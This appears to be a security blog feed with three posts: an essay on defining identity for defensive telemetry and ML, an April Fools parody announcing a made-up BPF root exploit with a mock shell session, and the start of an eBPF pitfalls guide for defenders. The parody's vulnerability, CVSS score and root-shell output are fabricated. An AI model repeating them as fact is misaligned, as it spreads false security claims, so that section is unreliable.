<p>In their 2010 book Identity Management Concepts, Technologies, and Systems<sup id="fnref:imc" role="doc-noteref"><a href="#fn:imc" class="footnote" rel="footnote">1</a></sup>,
Elisa Bertino and Kenji Takahashi defined identity as information about an
entity that is sufficient to identify that entity in a particular context. Dr.
Omondi Orondo, on the other hand, defines it in Identity & Access Management: A
Systems Engineering Approach as a system representation (or abstraction) of a
human being acting on the IAM system<sup id="fnref:orm" role="doc-noteref"><a href="#fn:orm" class="footnote" rel="footnote">2</a></sup>.</p>
<p>What happens when we look outside of the technology industry? Other disciplines
study identity too! Dr. James Fearon published a draft paper in 1999 called
What is identity (as we now use the word)?<sup id="fnref:wat" role="doc-noteref"><a href="#fn:wat" class="footnote" rel="footnote">3</a></sup>, which summarizes many definitions
of identity from across many publications. For example, Hogg and Abrams defined
identity in 1988 as “people’s concepts of who they are, of what sort of people
they are, and how they relate to others.” That won’t work for us infosec folks,
because we need to incorporate machine identities that don’t (yet?) have a
sense of self. In Dr. Fearon’s own words, “the range, complexity, and
differences among these various formulations are remarkable.”</p>
<p>Here’s the thing: these definitions leave a lot to be desired. In the context
of their respective textbooks or publications, they make sense and work, but
they don’t generalize very well. Ultimately, they raised some questions for me,
and with that in mind, I’d like to propose my own definition that answers those
questions. The questions I have are:</p>
<ul>
<li>Can we define identity without using the words identity or identify?</li>
<li>How do we account for non-human entities and their identities?</li>
<li>Is an identity really a one-to-one mapping, as these definitions imply?</li>
</ul>
<p>The first question refers to tautological definitions. We’re defining identity
with identity, or with identity and access management (IAM). We need a more
fundamental definition.</p>
<p>The second question relates to the plethora of purely non-human identities we
commonly deal with. How do we account for those? Lots of definitions simply
don’t.</p>
<p>And finally, the third question relates to a common assumption among many
authors, companies, and technologies: one entity has one identity, and you can
affirmatively identify the entity with that… identity. This doesn’t hold up
in practice.</p>
<h2 id="well-do-it-live">We’ll do it live</h2>
<p>Let’s make our own definition! How should we do that? Well, to start, we’ll
actually need to define two terms. Keep in mind that my perspective is colored
by the lens of defensive security research, so these definitions may not be
applicable to all situations. Still, they’re what I try to keep in mind when
I’m doing identity work.</p>
<ul>
<li><strong>Participant</strong>: any entity capable of <em>acting upon</em> or <em>being acted upon</em>
by any other entity.</li>
<li><strong>Identity</strong>: any set of information that fully describes a participant or
<em>set of participants</em> in a <em>particular context</em>.</li>
</ul>
<p>Those two definitions imply the following:</p>
<ol>
<li>Participants are not all humans.</li>
<li>Participants may be entirely passive.</li>
<li>Participant-to-Identity can be a one-to-one, one-to-many, many-to-one, or many-to-many relationship, or anything in between.</li>
</ol>
<p>Participants do <em>stuff</em> to other participants. This <em>doing of stuff</em> exposes
information that can be used to identify participants and construct an identity
for them.</p>
<h2 id="how-should-we-digitize-identity">How <em>should</em> we digitize identity?</h2>
<p>Again, this is from a defensive security researcher’s perspective. When we talk
about digitizing identity, we have to work with what we have. And what we have
is security telemetry. So how do we digitize identity using security telemetry?
Security telemetry actually gives us a lot of what we need to start digitizing
identity.</p>
<p>We can collect the stuff participants do and the information exposed during
these actions. The information exposed can be thought of as a passive identity
or identifier, and the stuff participants do can be thought of as an active
identity or identifier. With one or both—and inside of a specific context—we
can use the information and actions exposed through security telemetry to fully
describe participants or sets of participants. Whatever form this description
takes? That’s your digitized identity.</p>
<h2 id="what-can-we-do-with-a-digitized-identity">What can we do with a digitized identity?</h2>
<p>Now that we have our digitized identities, what can we actually do with them?
For this to be a worthwhile endeavor, that digitized identity artifact needs to
be useful. We can lean on the active-passive distinction to guide us here.</p>
<h3 id="active-identities-are-for-alerting-something-you-do">Active identities are for alerting (something you do)</h3>
<p>If you want to get alerted when an identity does something it’s not supposed to
do, active identities are your friend here. An active identity describes a
participant by what it does. If you know what a participant is supposed to do
(or supposed to not do), you can build and check active identities. You can
think of an active identity as “User A frequently logs in to Server B.” These
behaviors might trigger security alerts.</p>
<h3 id="passive-identities-are-for-baselining-and-discovery-something-you-are">Passive identities are for baselining and discovery (something you are)</h3>
<p>If you want to get more nebulous identity insights into a particular
environment, passive identities will have your answers. You can think of a
passive identity as “User A and User B typically work on the same projects.” I
find it easier to explain this with questions, so here’s a few questions you
might answer with passive identities.</p>
<ul>
<li>What does my environment’s identity network look like?</li>
<li>Is this participant who we expect them to be?</li>
<li>What other participants does this participant routinely interact with?</li>
</ul>
<p>Passive identities let you build fun things like identity network graphs and
identity profiles, which you can combine with active identities to start asking
and answering these questions and more.</p>
<h2 id="welcome-to-the-identity-machine">Welcome to the [Identity] Machine</h2>
<p>This is where machine learning (ML) comes into play. We can ask and answer a
lot of good questions manually, or with heuristics, but at a certain scale,that
becomes intractable. From my (again, biased) perspective, there are three main
ways we can leverage machine learning to understand identities.</p>
<ul>
<li>We can enrich identifying information to build meta-identities. For example, we can cluster and build identities for virtual teams within an organization that don’t follow the org chart, giving you ground truth on how people are working together.</li>
<li>We can contextualize information with relevant identifiers, whatever that may be. For example, if you’re reviewing a suspicious firewall alert (which, let’s be honest, is almost definitely a false positive), it might be helpful to know who is making that connection and if this falls in line with their expected behavior. Think of how many alerts you can filter out just by enriching them with identity information.</li>
<li>We can automate the asking and answering of difficult questions. With meta-identities and identity-enriched context, we’re in a good spot to automate a ton of identity-related questions and tasks. What that automation looks like depends on the identity problems you’re trying to solve, but I’m sure if you made it this far you can come up with something.</li>
</ul>
<h2 id="show-me">Show me</h2>
<p>I’d like to close by putting it all together with a concrete example. We’ll ask
a deceivingly simple question: when someone logs into a server, are they doing
it from a place we expect? If you’ve worked with IP reputation, IP geolocation,
and improbable travel modeling, you know trying to answer this manually or with
heuristics can be tricky.</p>
<p>Well, using security telemetry alone, we can answer this question. The first
step is to gather up all our active and passive identifiers and build out an
identity network. This will include employees, but also workstations, servers,
offices, service accounts, and so on. The different attributes or pieces of
information in these active and passive identities will be the features for our
machine learning pipeline. With these features, we can now model and solve this
question as a machine learning problem.</p>
<p>Now, if you’ve worked with ML on these kinds of problems before, you’ll know
that this alone will generate a ton of false positives. Anomaly detection
algorithms detect anomalies, not evil. Anomaly detection doesn’t know what your
goals are, it just knows what’s normal and what isn’t. This is where our
meta-identities from the previous section can really help us out. By
intelligently constructing our ML architecture and incorporating those enriched
features, we can alert, for example, when an unexpected virtual team accesses a
server, instead of an unexpected individual human. Alternatively, we can
automatically cluster a group of servers that leverage service accounts to
perform periodic tasks, even without an explicit organizational definition.
This significantly cuts down on the noise generated by the ML model, and gives
us a good artifact to automate.</p>
<p>With the automated ML pipeline done, we can expose this model as a question for
humans to pull answers from during an investigation. When an analyst starts
triaging this suspicious logon firewall alert (that triggered on some out of
date, inaccurate, IP geolocation list), they can run it through the model. In
addition to getting a classification out of the model (is this expected or
not?), they can also dig into the meta-identities and other enriched
information used.<sup id="fnref:aix" role="doc-noteref"><a href="#fn:aix" class="footnote" rel="footnote">4</a></sup></p>
<p>After a few iterations, the human analyst will probably have a good idea of
what heuristics they need and what manual investigation they perform when they
get these alerts, and the whole process (or at least a meaningful subset of the
process) can be automated. We can extend this same model and/or process to
other questions as well. Essentially, we are looking for various statistical
outliers in different clusters. For example, based on their team, should a user
be running a certain binary? Should they be reading a certain document? Do they
typically send more external or internal emails? What do their inbox rules
usually look like? Which teams are using what SaaS applications? Each of these
might require independent modeling and analyst review.</p>
<h2 id="you-write-too-much-summarize-it-for-me">You write too much. Summarize it for me?</h2>
<p>No problem, lazy straw person! Everyone has their own definition of identity,
based on their use case, so we’re not doing anything too radical by reframing
identity to better help us solve security problems. From a security
perspective, identities are highly contextual relationships between
participants characterized by what they do to each other. Embracing identities
in security telemetry by describing them as they are as opposed to prescribing
them as we believe they should be gives us a lot of flexibility and power. We
can take advantage of that flexibility and power to find evil, and protect
users and customers.</p>
<div class="footnotes" role="doc-endnotes">
<ol>
<li id="fn:imc" role="doc-endnote">
<p>This is a more traditional IAM book and a fairly easy read. Details on <a href="https://books.google.com/books/about/Identity_Management.html?id=UrmD-Gxt-8IC">Google Books</a>. <a href="#fnref:imc" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:orm" role="doc-endnote">
<p>It’s an interesting perspective that is worth checking out. You can find details <a href="https://books.google.com/books/about/Identity_Access_Management.html?id=ajb2oAEACAAJ">about the book here</a>. <a href="#fnref:orm" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:wat" role="doc-endnote">
<p>It’s apparently been in a draft since 1999, but you can <a href="https://web.stanford.edu/group/fearon-research/cgi-bin/wordpress/wp-content/uploads/2013/10/What-is-Identity-as-we-now-use-the-word-.pdf">read it here</a>. <a href="#fnref:wat" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:aix" role="doc-endnote">
<p>If you’re interested in this concept in general, the keyword to search for is “AI explainability.” Great projects like <a href="https://github.com/Trusted-AI/AIX360">AIX360</a> need more contributors. <a href="#fnref:aix" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
</ol>
</div>Friday OrtizTL;DR: What is identity security, why we often do it wrong, and how we can get it right.BeeSTrING: Critical Vulnerability in BPF Subsystem Allows Fully Unauthenticated RCE as Root2022-04-01T05:00:00+00:002022-04-01T05:00:00+00:00https://ortiz.sh/clout/2022/04/01/NEW-HOTNESS<p><strong>TL;DR:</strong> Look at the publication date, I’m fucking with you.</p>
<p>This is a guest post from an anonymous security researcher that I overheard
talking about BPF at a cafe that I’m sitting at right now. They were wearing a
hooded sweatshirt and talking with their mother on the phone in some weird
tonal language (their computer also had characters I didn’t recognize, which
confused and frightened me) so we should all assume that they’re an elite
Chinese government agent hacker (maybe Russian, I’m honestly pretty racist),
and take the following information very very seriously.</p>
<h1 id="beestring">BeeSTrING</h1>
<p>I’m calling this vulnerability BeeSTrING because bees are cute (I like
bees<sup id="fnref:bees" role="doc-noteref"><a href="#fn:bees" class="footnote" rel="footnote">1</a></sup>), and bee sounds like the B in BPF. The <code class="language-plaintext highlighter-rouge">string</code> part comes from
how the vulnerability works (I think lol) and the capitalization makes STING,
which is a thing bees do! I want this to be taken very very seriously (have I
mentioned that?) and make me very very popular, so it needs a cute catchy name.</p>
<p>My primary motivation for sharing this is that eBPF is incredibly trendy right
now, and also the severity of the vulnerability means that businesses
everywhere should take note and do something about it. I’m not sure what, but
definitely something. As of writing this, there is no patch and impact is
unclear. But I’m hoping by bringing this incredibly severe vulnerability to
light, the security community will do step in and do what they do best:
leverage this for vendor blogspam and marketing email FUD.</p>
<p>Keep in mind that everything I’m writing here is from a broken conversation
with some scary looking dude I met at a cafe downtown, so treat it as wild
rumor and speculation. But also be afraid and take it seriously. Do both, or
I’ll tweet a hot take about how much you suck at your job when you get popped
if I don’t like your company. If I do like your company I’ll probably tweet
something with #hugops. Basically just be cool and you’ll be fine.</p>
<p>Before getting into how this works, you should note that I want you to think
this is related to a recent BPF
<a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23222">CVE-2022-23222</a>
that also affects the BPF verifier. It isn’t, but I want you to think that it
is.</p>
<h1 id="how-it-works">How It Works</h1>
<p>A properly crafted BPF program with a specific malicious string can be tossed
at a Linux system running literally any kernel version ever (even the ones
without BPF, somehow) in a series in UDP packets. The crafted BPF program will
be passed to the BPF verifier, whereupon the malicious embedded string will
spawn a reverse shell as root to the attacker.</p>
<h1 id="poc">POC</h1>
<p>They graciously provided me with a copy of their code that I could host on my
own repository. I haven’t looked at it because it has scary foreign characters,
but I did run it. The root shell makes a sweet screenshot for twitter, so you
should also run it.</p>
<p>You can find a link to it <a href="https://github.com/FridayOrtiz/BeeSTrING">here</a>. I
will probably also tweet about it if I remember, <a href="https://twitter.com/FridayOrtiz">so give me a follow
too.</a>. But don’t bother clicking stuff, I have
a snippet of the POC in action right here.</p>
<p>The setup for the POC is a vagrant lab with two virtual machines running the
latest, fully patched, Ubuntu 22.04 LTS. The victim VM is on <code class="language-plaintext highlighter-rouge">100.69.42.13</code> and
the attacker machine is on <code class="language-plaintext highlighter-rouge">100.69.42.12</code> (because BPF is democratizing
CGNAT!).</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ git clone https://github.com/RafaelortizRC/BeeSTrING
$ cd BeeSTrING
$ make
$ ./exploit --help
┏┓ ┏━╸┏━╸┏━┓╺┳╸┏━┓╻┏┓╻┏━╸
┣┻┓┣╸ ┣╸ ┗━┓ ┃ ┣┳┛┃┃┗┫┃╺┓
┗━┛┗━╸┗━╸┗━┛ ╹ ╹┗╸╹╹ ╹┗━┛
~ by @FridayOrtiz && some other guy ~
usage: exploit <your IP> <victim IP>
FOR EDUCATIONAL PURPOSES ONLY ;)
happy hackin'!
$ ./exploit 100.69.42.12 100.69.42.13
...hackin'
...hackin'...
hackin'...
done!
# ip a
5: virbr0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state UP group default qlen 1000
link/ether [REDACTED] brd ff:ff:ff:ff:ff:ff
inet 100.69.42.13/10 brd [REDACTED] scope global virbr0
valid_lft forever preferred_lft forever
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
# ^D
$ echo 'awesome!'
awesome!
</code></pre></div></div>
<h1 id="impact">Impact</h1>
<p>Since I didn’t read the source and didn’t actually verify any details, I have
no idea what the impact of this vulnerability is (I could’ve read the source
but honestly? it’s my day off and I don’t feel like it). But I’m not going to
let that stop me from speculating wildly.</p>
<p>Due to the severity and ease of use of the vulnerability, I’m going to call
this a CVSS 10.0/10.0 (for any version of CVSS your org is using). It is
recommended that you patch as soon as possible (note: there is currently no
patch available, but check out this neat kernel commit!
<a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=7b58b82b86c8b65a2b57a4c6cb96a460654f9e09">7b58b82b86c8b65a2b57a4c6cb96a460654f9e09</a>,
isn’t Linux cool? Also, aren’t I really super cool for understanding that
commit? Fun, right? Kernel hacking!)</p>
<h1 id="is-my-org-impacted">Is my org impacted?</h1>
<p>It’s a Linux vulnerability, so yes. However, the course of action will not be
the same for all orgs. Certain orgs that can’t risk the downtime or have other
priorities (such as hospitals) should probably just ignore this (be scared
still though). Orgs that should most pay attention to this vulnerability are
security vendors, because FUD is great for business.</p>
<div class="footnotes" role="doc-endnotes">
<ol>
<li id="fn:bees" role="doc-endnote">
<p>This actually isn’t part of the joke, <a href="https://www.nrcs.usda.gov/wps/portal/nrcs/detail/national/plantsanimals/pollinate/?cid=stelprdb1263263">bees are awesome.</a> <a href="https://thebeeconservancy.org/10-ways-to-save-the-bees/">We really gotta save the bees.</a> <a href="#fnref:bees" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
</ol>
</div>Friday OrtizTL;DR: Look at the publication date, I’m fucking with you.every Boring Problem Found in eBPF2022-02-22T04:00:00+00:002022-02-22T04:00:00+00:00https://ortiz.sh/ebpf/2022/02/22/EVERY-BORING-PROBLEM<p><strong>This article was originally written for tmp.0ut volume 2 and is available
here: <a href="https://tmpout.sh/2/4.html">https://tmpout.sh/2/4.html</a>. Due to the
unique (read: badass) format of the zine, it is replicated here as plaintext.</strong></p>
<h1 id="errata">Errata</h1>
<ul>
<li>In the section <code class="language-plaintext highlighter-rouge">Stable interfaces aren't</code>, “and on a kernel older than 4.17”
should read “and on a kernel newer than 4.16”</li>
</ul>
<h1 id="article">Article</h1>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>*** Looking up your article...
*** Found your article...
:~$ head alex.ascii
,,,... ...,........
.*//(((((((/(((((((((####((/*,.
.,*/(//(//(((#%%###(##%%%##(#%%%%%#####(*..
.***/((//((##/###(#%&&&&%%%&%%%&&%#%%%%&&&&%%%%#/,.
.,**/(/((##%#(((###%%%%%%&@@&&&&&&&&&&&&&@@&&&&&&&&&%(.
..*///#((#(((#%%%##%%%%&&&&&&@@@&&&&&&%%%&%&&&@@@@@@@&&%#*.
,*(/(((((((((###%%%%%%%&%%%&&%%%%%#%###((/////((##%&@@@@&&&%%(*.
.*/(/(##(########%#%%%%%%###%%####((((///**********//(((#&&@@@&&&%(,
.*/((##############(((////(/*******,,,,,*,,*,,,,*****/////((#%@@&&&%#(*.
,/(/(((####%#(((///**,,,,,,,,,,,,,,,,,,,,,*,,,,,*********//////((&@&&%%&%/.
,/((#((((##(((/**,,,,.....,,,,,,,,,,,,,,,,,,,,,,*************////(%&&%%%%%(.
,*/((##/(##(*...,........,,,,,,,,,,,,,,,,,,,,**,,,*************///(%&&%%%%%/.
.*(##(((((#%(,.. .. .......,,,,,,,,,,,,,,,,,,,,,,,,,***********////(#%&&%#%%%(,
,/(((//(##&#*,. ....,,,,,,,.,..,,,...,,,,,,**************/////(#%&%%%%%%%#*.
,(##(###%&%#*. .,*/(#%###((/*,,..,,,..,,*/((##%%%###%%####((////((#%%&%%##%%%#,
,(##(###&%&%#, ,////**,,,,*/(/////*,,,,,,,**/((##%%&%&&&&%%&&%&%#(///(%&&%%&%%%%%#*.
,(%%%#####(%(..*,,**/////*/////*/,**,.,,***/(* .*/(((#(((///*/((#%%#(((%@@%&&&&&%%#((/,
,(###((/. ,,,,///(/*....,///*//(/,.,,,/((.*((/(*,/(##/,,,*((**//((((((%@&&&&@@&%(,.
./((((((%,,,**** /*/##(/,/*.,,***/(.. ...,(*//(#(,.,,**(((**/(((%&@&@@@@&@%*.
./((##%&.,,*, . .//./(//,..**.,**/(*//*,*/(/(#((/,,,***//*,*((###%@@@@@@&&%*
,(##%&(.,,..,,,. . .,.. /.,,**//#(./*,,*,,,.,.,*********,////((&@@@@@@@&&#.
,(##%. ,. . . *. .,**/((*.****,,,,,........,,,,**////#&@@@@@&&&(,
.*/* ............... .. ....,**//((/,*/*****,,,,,,,,,**////////&@&&&&&%,
,. ........,,,.............,**//(//*/**,***,,,,,,,*//////////%&%#/*.
.. ..........,,,,,,*///**///****,***////***//*/*/////(%(*.
.. ........,.,*((#/**//##&#////*,,,,,,,*************///(#(*.
.. .......,,,,..,*/*,,,****/(((((/*,,,,,,,,,********/////(((/*,
... . .............,*(((/(//////(####//***,,,,*,,,,*****/////((#/,.
.,............,*///(##(///(///((((##%%#((///*,,,********////((##*.
,,,........*/(((#(/**,,,*,,,,,,*//#%%%%%%%##(/******////((((###*.
,.,,,,,.,.*(((((/**//(((/,,,/**/(/(((((#%%%%%%#(//*//((((((###.
.,,,,,.,,,(/****/#&#//***,,,,,*//*/(#%%##((((#%#(//(((((((((#(
.,,****,,,,,,,,,...,,..,,,,*******////((///**//(#(((((#((((##*
,**,***,,*,,,.........,,,,********///******///*/(((#((((####.
,****,,,,,***,,.....,*///(((((((((//****//(((/(((###(###%%/.
.****,,,*/((/*,,....,*//(#((//****/*///(######(((#(##%%&%(.
,*//**/((#((/*****//*//////////(#(##%%%%&%####%#&%&&%/,
*##########((**//////(/((/(/#(##%%&&%&&&&%&&&&&&&#,
,#%%&%%%###(((((((//((((((###%%%&&&&&@@&@@@&&&%(,
,/#%&%%%#(##(#(#((########%#%%&&@&@@@@&@&&%#*.
.*(%&&%%###(####%#%%###&%&&&@@@@@&&&&%%%#/,
.,*(%&&%%%%&%&&&&&&&&&@@@@@&&&&%&%(*.
.,*(##%%&%%%&%&&%%%%#((///*,.
.
~~[every Boring Problem Found in eBPF] by @FridayOrtiz~~
> /WHOIS @FridayOrtiz
*** @FridayOrtiz https://ortiz.sh/contact/
> /LIST
*** eBPF, BPF, Linux Kernel, guide, tips
+-#- Introduction -#-
|
| About six months ago I started a new job and dove into adding Berkeley Packet
| Filters (BPF) as a telemetry source for our Linux endpoint security agent. This
| work culminated in the release of three open source libraries ([0], [1], [2]).
| This isn't about that, though. This is about the issues we ran into while
| implementing BPF as defenders, and how defenders can use BPF in their
| environments (although attackers should find useful tips in here too). I went
| through every PR, Jira ticket, and message from the past six months to put
| together this list of BPF gotchas and their solutions. I hope it helps
| defenders, developers, and researchers ramp up with BPF faster than I did.
|
| Note: I'm going to use BPF to mean extended BPF (eBPF), since that's the
| official name. Not to be confused with the old classic BPF (cBPF). I'm also
| going to assume you're *loosely* familiar with BPF, enough to be considering
| whether or not to deploy it in your environment.
+-
+-#- Why even use BPF? -#-
|
| You may be wondering, "if you're filling an article with caveats about BPF, why
| should I even bother trying to use it?" Great question, straw man. There are a
| number of things BPF is really, really, good at that you should consider.
|
| - **You can get visibility (almost) anywhere you want.** If there's a specific
| code path within the kernel (or userspace) that you know will be executed during
| an attack, you can put yourself there. If there's a payload value in a packet
| you need to see before it hits your `iptables` rules, you can do that. Want to
| modify or block syscall args? You can do that too.
|
| - **You can reinstrument dynamically.** Change your mind about what you want to
| inspect? Change it while it's running. You can either swap out the entire
| program (although that might not be possible in the future with signed BPF
| programs[4]) or modify behavior by updating BPF maps from userspace.
|
| - **It's safe!** You can do all these things with a Linux Kernel Module (LKM),
| sure, but the BPF Virtual Machine (BPF-VM) and verifier ensure (or at least
| try really hard to ensure[17]) that you can't panic or break the kernel.
|
| - **It's container aware, or at least it can be**. Instrumentation alternatives
| like `auditd` tend to struggle in containerized environments, returning values
| that only make sense in certain namespaces, or losing track of things entirely.
| BPF, on the other hand, can give you information in whatever context you want
| (as long as you program it that way).
|
| - **It's fast.** Do as much work as possible in the BPF program before sending
| information up to userspace, and you can avoid expensive context switching or
| race-prone data enrichment.
|
| - **It's atomic (sort of).** BPF programs generally aren't preemptable (there
| are exceptions[5]). This applies to tail calls as well, so you can set up some
| fairly complex logic in your instrumentation without worrying too much about
| reentrancy.
+-
+-#- The problem with BPF. -#-
|
| From this writer's perspective, there are two main problems with BPF: 1) it's
| now being used in ways it was never designed for (i.e., it's evolving naturally
| over time) and 2) there's a large overlap in maintainers of the Linux kernel's
| BPF subsystem and userspace BPF tooling.
|
| The following are concrete issues stemming from (1):
|
| - BPF isn't really CO-RE (Compile Once - Run Everywhere), it's more CE-RO
| (Compile Everywhere - Run Once). A lot of userspace tooling "achieves" CO-RE in
| practice by compiling on the host machine. New true CO-RE features are... new.
| Chances are you need to support a kernel that doesn't have them. End-of-life
| doesn't mean much when the host is running a business-critical function and the
| suits see too much risk in upgrading it. And loading a full toolchain to
| compile BPF programs on the host is often a no-go too.
|
| - The toolchains and libraries are designed around `bpftrace`-like use cases.
| That is, one-off tooling for diagnosing specific problems. Brendan Gregg's
| book[7] is a great resource for this. Now that BPF for long-running daemons is
| gaining popularity, the maintainers are working hard adding features to support
| this (like the aforementioned true CO-RE). Unfortunately, again, these features
| probably won't exist on the kernels you need to support.
|
| - There are many different types of BPF programs (which we'll cover), that all
| have varying load and run semantics. Depending on whether you want to run a
| kprobe or a TC classifier, you'll have to use entirely different methods to do
| so. And while you're writing them, the helpers available to you can vary
| wildly. And the documentation is incomplete, scattered, and often out of date,
| because...
|
|
| And here are some specific examples of issues stemming from (2):
|
| - Because of the overlap, documentation of the pure BPF interface(s) (there's a
| plethora, we'll cover that) is lacking. The people that maintain it write the
| userspace tooling, so they don't need in-depth documentation. Seriously, go
| check out the BPF manpage for whatever distro you're on. Chances are it's
| missing a ton of helpers and there's more than one "TODO: fill this out" that's
| been sitting there for years. Why not use their userspace tooling? Well...
|
| - Their userspace tooling is a magic labyrinth. In order to get close to CO-RE in
| a backwards compatible way, it's filled with kludges you probably don't need.
| Ideally, you'd interface directly with the underlying syscalls and use only
| what you need. But doing that is undocumented. And, because of the
| documentation issues, there's really no community drive to simplify these
| libraries. Because these libraries cover (until recently, see (1)) the majority
| of historical use cases, there's no drive to improve the documentation. Even if
| you did, you'd have to backport and patch your documentation to cover all the
| little idiosyncrasies across kernel versions, and boy are there a lot of those.
+-
+-#- Implementation Issues -#-
|
| While working with BPF we ran into a number of implementation specific problems
| that lead to us building and publishing those three ([0], [1], [2]) BPF tools.
| If you're a defender, or work in security, and you're considering getting
| started with BPF here's a list of things you'll probably want to know.
| Presented in somewhat logical order.
|
| +-**- The verifier sucks, but the alternatives are worse. -**-
| |
| | -...- Problem -...-
| |
| | You will run into lots of problems with the verifier. For example, what's the
| | difference in the following two code snippets?
| |
| | ```c
| | u32 *p = 1;
| | u32 i = *p;
| | ```
| |
| | ```c
| | u32 *p = 1;
| | u32 i = NULL;
| | __builtin_memcpy(&i, p, sizeof(u32));
| | ```
| |
| | I'll tell you: the first one fails the verifier, the second one does not. But
| | only sometimes, except when it works. Which depends on the kernel version.
| | Maybe. I mean, they should compile to the same thing, right? Apparently not,
| | and subtle differences can completely throw the verifier off.
| |
| | The real problem with the verifier is that it's getting better all the time. As
| | BPF use cases settle out, the maintainers are changing the BPF verifier to
| | better support them. That means on older kernel versions, without these
| | patches, you'll have to perform strange workarounds to get your code working
| | with older verifiers.
| |
| | A few more verifier problems you'll likely encounter supporting a wide range of
| | kernel versions:
| |
| | - The verifier hates looping. But, sometimes, it also hates loop unrolling. If
| | `clang` generates enough jumps and gotos, even if you tell it to unroll
| | everything, the verifier might (depending on version) fail it anyway. The
| | verifier needs to be able to keep track of all branches and ensure a maximum
| | depth limit. If it can't (whether it's because you're looping or because the
| | verifier can't keep up) your program will fail to verify.
| |
| | - In older kernel versions (but not newer ones) variable reads and writes are a
| | big no-no. All offsets must be known at compile time. That means you can't do
| | things like set `some_array[variable_index] = some_value`. This, plus the
| | aversion to loops, makes it nearly impossible to read strings from memory on
| | kernels without the `read_str` family of helpers. The kernel's own `qstr`
| | involves variable memory access—and good luck finding (or setting) the null
| | terminator on your own.
| |
| | - Everything that might be a pointer must be null checked. If you don't, the
| | verifier will refuse to load your program even if it's safe. This makes it hard
| | to work with programs that might expect a null value. The convention that most
| | pleases the verifier is to return immediately after a failed null check, and
| | getting around this is tricky and involves trial and error.
| |
| | There are alternatives to the kernel verifier, such as PREVAIL[8], but they
| | have their own set of issues. For what it's worth, PREVAIL is an impressive
| | project and Microsoft will be basing their Windows BPF verifier off of it. But,
| | unfortunately, it doesn't match the expected behavior of kernel verifier. Just
| | because something passes PREVAIL doesn't mean it will pass the kernel verifier.
| | Just because something fails PREVAIL doesn't mean it will fail the kernel
| | verifier (even though it probably should).
| |
| | -...- Solution -...-
| |
| | **Run early, run often, run everywhere.** Your development environment should
| | make it as easy as possible to test your code on all the kernels you need to
| | support (or as close to a representative sample as you can get). The only way
| | to know if the kernel verifier will accept your program is to run it through
| | the kernel verifier, the real kernel verifier, on the specific kernel you're
| | targeting. Note that this means the distro-specific kernel, with all their
| | modifications and backports. For example, the older Enterprise Linux (red hat,
| | centos, and so on) kernels (2.x and 3.x) have backported BPF features that
| | might surprise you, since they don't line up with mainline kernel version
| | numbers. The only way to know what's supported is to try it.
| |
| | **Enable logging.** This one comes with a caveat. You need to provide the
| | verifier with a large buffer of memory to write its verification logs into. If
| | you don't give it enough space it will fail verification, even if the program
| | would otherwise pass. If your programs are complex, then make sure your buffer
| | is large enough (but not too large, or loading will take forever) and be sure
| | to turn off verifier logs in production to avoid issues with programs failing
| | to load when you know they should.
| |
| | **The error messages you get will seem cryptic at first.** The BPF verifier
| | uses a lot of terminology and has a lot of restrictions that are undocumented
| | (of course) that you'll learn with time. If you get stuck, the BPF Compiler
| | Collection (BCC) GitHub repo's issue tracker[9] is a great resource. You can
| | probably find a Brendan Gregg ticket that goes over at least the broad class of
| | error you're getting.
| +-
|
| +-**- BPF doesn't really exist. -**-
| |
| | -...- Problem -...-
| |
| | BPF is really just an instruction set, for which the Linux kernel provides a
| | VM, verifier, and some helper functions. You run your programs inside this
| | execution context, and call the helper functions to extend the VM's
| | capabilities. When you write a BPF program, what you're really writing is a
| | kprobe, or a uprobe, or an eXpress Data Path (XDP) classifier, or a Traffic
| | Control (TC) classifier, or one of the many other types of kernelspace programs
| | that have been offloaded to the BPF subsystem. There's a ton of BPF program
| | types and more are being added all the time, for a variety of use cases. It
| | turns out being able to safely execute code in the kernel enables a ton of
| | interesting and helpful functionality. Unfortunately, every program type has
| | its own way to load, run, and clean up after it, most of which is entirely
| | undocumented.
| |
| | On certain distros, the tools you'll need to load these programs might not be
| | enabled by default. For example, some distros don't automatically mount
| | `debugfs`, which you'll need to load kprobes on older kernels.
| |
| | When you do figure out how to load your program, the ABI for defining programs
| | is entirely based on undocumented, implicit, convention. For example, you'll
| | see a lot of `SEC("kprobe/my_kprobe")` to tell the loader that you're loading a
| | kprobe.
| |
| | ```c
| | /* helper macro to place programs, maps, license in
| | * different sections in elf_bpf file. Section names
| | * are interpreted by elf_bpf loader
| | */
| | #define SEC(NAME) __attribute__((section(NAME), used))
| | ```
| |
| | This is actually entirely unnecessary, on the syscall level, and is merely a
| | common convention. As you can see in the above snippet, it's just a macro to
| | set the section name in the compiled ELF executable. There's nothing
| | BPF-specific about it. So you not only have to know the requirements of the
| | program type you're trying to load, but also the conventions used by the tools
| | that load and run it.
| |
| | -...- Solution -...-
| |
| | Figure out what you want your program to do first. Do you want visibility into
| | the kernel? Then you'll probably want a kprobe or tracepoint. Do you want to
| | drop inbound packets? You probably want XDP. Do you want to build detections on
| | outbound traffic? You might want TC, or you might want a kprobe in the kernel
| | network stack. Figure this out, then figure out what you're going to need to
| | run it the way you want to run it (one off? daemon?). When we made `oxidebpf`
| | we had to optimize for stability in the features we needed most (e.g., kprobes)
| | over coverage of all the different BPF program types.
| |
| | If you can't find libraries to suit your needs for your chosen program type,
| | you'll probably have to write it yourself (or contribute it to an open source
| | project). Because everything is poorly documented, you'll have to dig through a
| | lot of source code to put together the real set of necessary functionality. The
| | official-ish libraries like libbpf and libbcc tend to work the best, but
| | there's issues there (that we'll get to).
| |
| | I highly recommend using `bpftool` for debugging while developing. It provides
| | the easiest-to-use view into what programs and maps are loaded and where. It
| | lets you visualize data in maps, dump programs, and more. The only problem with
| | `bpftool` is that it's never in the same package. Some distros and repos let
| | you install it with a `yum install bpftool`. Others require you `apt-get
| | install linux-oem-tools`. Sometimes you need to `apt-get install
| | linux-oem-tools-`uname -r``. It depends. Whatever you're running, though,
| | you'll probably want this tool installed.
| +-
